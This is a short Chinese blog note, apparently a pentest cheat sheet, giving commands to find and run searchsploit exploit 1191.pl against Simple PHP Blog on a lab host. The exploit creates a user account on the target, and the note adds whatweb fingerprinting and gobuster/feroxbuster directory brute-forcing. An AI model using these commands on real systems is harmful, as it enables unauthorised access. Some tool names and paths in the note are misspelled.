找历史框架漏洞
查找相关框架漏洞
searchsploit Simple PHP Blog(cms名称)
下载相关文件
searchsploit Simple PHP Blog -m 1191.pl
查看perl文件
mousepad 1191.pl
下载模组
sudo apt install libswitch-perl
创建一个用户
sudo perl 1191.pl -h http://10.10.10.100/blog -e 3 -U l33t -P l33t
通过kali查找cms架构和版本
whatweb
目录遍历
ferobuster
feroxbuster -u http://10.10.10.100/
gobuster
使用字典进行爆破
gobuster dir -u http://10.10.10.100:80 -w /user/share/dirbuster/worldlists/directory-list-2.3-medium.txt
标签:常用,http,收集,1191,kali,10.100,perl,pl From: https://www.cnblogs.com/zxskb/p/18212739